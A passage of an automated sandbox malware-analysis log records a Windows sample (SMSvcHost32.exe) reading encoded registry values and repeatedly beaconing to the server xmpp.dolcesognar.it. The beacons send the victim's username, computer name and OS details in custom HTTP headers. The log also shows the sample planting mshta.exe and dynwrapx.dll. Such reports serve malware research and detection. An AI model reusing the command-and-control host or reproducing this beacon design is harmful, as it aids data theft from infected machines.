| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = WMA 1 |
|
1 | ||
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rbody320 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77a2d9b0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 98189 milliseconds (98.189 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody320, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rbody320 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77a2d9b0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8, type = REG_NONE |
|
1 |
Thread 0x638
6
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-13 14:02:06 (UTC) |
|
2 | |
| System | Add Certificate | disposition = 112721544 |
|
1 | |
| System | Open Certificate Store | encoding_type = 0, flags = 65536 |
|
1 | |
| System | Add Certificate | disposition = 3 |
|
1 | |
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\mshta.exe, desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Thread 0xf74
1
1
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| DNS | Resolve Name | host = xmpp.dolcesognar.it, address_out = 109.230.199.30 |
|
1 | |
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\dynwrapx.dll, desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Thread 0xe04
3
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\fatal-log.txt, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\uncaught-log.txt, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\dynwrapx.sxs.manifest, desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Thread 0x628
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = \\?\C:\Users\Nd9E1FYi\AppData\Local\Temp\mshta.exe.manifest, desired_access = FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, DELETE, file_attributes = FILE_FLAG_OPEN_REPARSE_POINT, FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Process #14: ping.exe
35
9
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\ping.exe |
| Command Line | ping localhost -n 4 |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0x30c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D5C
0x
C48
0x
D60
0x
E5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00100000 | 0x001bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Private Memory | rw |
|
|
|
- |
| ping.exe.mui | 0x00df0000 | 0x00df2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x0105ffff | Private Memory | rw |
|
|
|
- |
| ping.exe | 0x01110000 | 0x01118fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001120000 | 0x01120000 | 0x0511ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05120000 | 0x05456fff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0a0000 | 0x7f0a0000 | 0x7f19ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1a0000 | 0x7f1a0000 | 0x7f1c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc1562ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc15630000 | 0x7dfc15630000 | 0x7ffc1562ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0xd5c
35
9
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ping.exe, base_address = 0x1110000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 | |
| DNS | Resolve Name | host = localhost |
|
1 | |
| DNS | Resolve Name | host = localhost, address_out = 0000:0000:0000:0000:0000:0000:0000:0001, 127.0.0.1 |
|
1 | |
| DNS | Resolve Address | address = 0, host_out = ::1 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| ICMP | Send ICMP Echo | source_address = 48.238.12.0, destination_address = 128.84.17.1, timeout = 4000 |
|
1 | |
| DNS | Resolve Address | address = 0, host_out = ::1 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| System | Sleep | duration = 999 milliseconds (0.999 seconds) |
|
1 | |
| ICMP | Send ICMP Echo | source_address = 48.238.12.0, destination_address = 128.84.17.1, timeout = 4000 |
|
1 | |
| DNS | Resolve Address | address = 0, host_out = ::1 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 | |
| System | Sleep | duration = 999 milliseconds (0.999 seconds) |
|
1 | |
| ICMP | Send ICMP Echo | source_address = 48.238.12.0, destination_address = 128.84.17.1, timeout = 4000 |
|
1 | |
| DNS | Resolve Address | address = 0, host_out = ::1 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| Environment | Get Environment String | name = OutputEncoding |
|
1 |
